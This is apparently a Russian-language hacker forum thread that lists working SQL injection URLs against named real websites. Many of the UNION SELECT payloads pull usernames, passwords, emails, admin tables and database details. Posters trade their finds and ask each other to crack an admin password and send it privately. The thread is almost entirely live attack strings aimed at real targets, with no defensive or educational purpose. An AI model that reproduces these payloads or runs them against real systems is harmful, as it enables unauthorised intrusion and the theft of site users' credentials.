SQL Инъекции

Code:

http://www.ukrnic.com/hosting_info.php?id=-99+union+select+1,2,3/*

UkrNic hosting =\

 

Code:

http://www.bizhost.ru/news/podrobno.php?id=-99+union+select+convert(table_name+using+cp1251),2,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

BizHost =\

 

Code:

http://www.kinoafisha.ru/index.php3?id1=3422+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,3,4,5,6,7,8,9,10,11,12,13/*&status=1

кол-во полей так и не доподобрал)

 

Code:

http://www.partytown.ru/music.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(uname,0x3a,pass),21+from+cinema_user+limit+0,1/*

 

Code:

http://www.goldedem.ru/?page=4+union+select+1,2,3,4,5/*

Code:

http://www.talitur.ru/tusa.php?idd=4+union+select+1,2,3,4,5,6,7/*

 

Code:

http://www.yuretz.ru/prikol.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Code:

http://www.mks-ks.ru/shop/offer.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18/*

Code:

http://www.paintball.ru/next.php?id=268%20union%20select%201,2,3/*

Code:

http://www.softmart.ru/prog/show_prog.php?id=1+union+select+1/*

 

Code:

http://www.leaderhost.ru/price/content.php?id=-99+union+select+1,2,user(),4,5,6/*

 

Code:

http://www.ecominfo.spb.ru/about/print.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,column_name,17,18,19,20,21,22,23,24,25,26+from+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='users'+limit+0,1/*

 

Code:

http://bitmaster.ru/index.php?id=-99+union+select+1,2,0x707265766564,4/*

=\

 

кто сможет пароль админский поиметь напишите в личку
P.S. Там пятая версия МуСкула. Таблицы admin_web и phorum_user
Интересует таблица admin_web. Логины есть, а таблицу с паролями я не нашёл. Может кто нибудь подберёт =\

 

_http://www.btl.ru/c/hr-vacancy.php?id=1728%20UNION%20SELECT%201,2,version(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

Code:

http://www.spytop.ru/maincat.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,concat(login,0x3a,pass),11,12+from+user/*

^^ - там странички полистаете .)

 

Code:

http://www.hazart.ru/index.php?id=5+union+select+1,2,3,4,5,6+from+admin_users/*

 

Code:

http://www.astek-travel.ru/price.php?id_level=400+union+select+1,name,3,4,5,pwd,email,8,9,10,11,12,13,14,15,16+from+users/*

Смотрим синюю шнягу) Чтоб было лучше видно - просто выделяем её)

 

Code:

http://www.hw.net.ua/art.php?id=-99'+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+16,2/*

 

Вот столбцы admin_web

Code:

tID
username
all_access
alumni
calendar
cilps
events
exam_archive
faculty_bios
faculty_news
faculty_workshops
faculty_rotation
faculty_digest
osjcl
elam
psf
registrar

Не все правда, но большинство, но есть ещё одна интересная таблица access: username, password.

 

Code:

http://www.ntkernel.com/wprod.php?ids=2+union+select+null,null,USER()/*

 

Code:

http://www.jurnal.md/articol.php?id=5722+union+select+1,2,userna me,userpas s,5,6,7,8,9,10,11+from+users/*

_____________________________________________
Shake if you want -Run if you can't !!!

 

_http://www.freelancejob.ru/vacancy.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

названия таблиц не подобрал ((

_http://prazdnik.com.ua/vacancy.php?id=5%20UNION%20SELECT%201,2,concat(login,char(58),pass),4,5,6,7,8+from+user+limit+1,1/*

_http://prazdnik.com.ua/vacancy.php?id=5%20UNION%20SELECT%201,2,3,4,5,6,7,8+ipbforum/*

к хосту прикручен форум ipb походу версии 1.3, название таблиц оттуда подобрать не смог...может кто поможет

 

_http://www.algis.ru/main.php?f=9&part=33&subpart=25+union+select+1,2,3,concat(name_users,char(58),password_users,char(58),email_users,char(58),tel_users),0x68612d68613b29,6,7,8,9,10,11,12,13,14+from+users/*

титл страницы после этого смешной становится))..правда пассы х.з как зашифрованы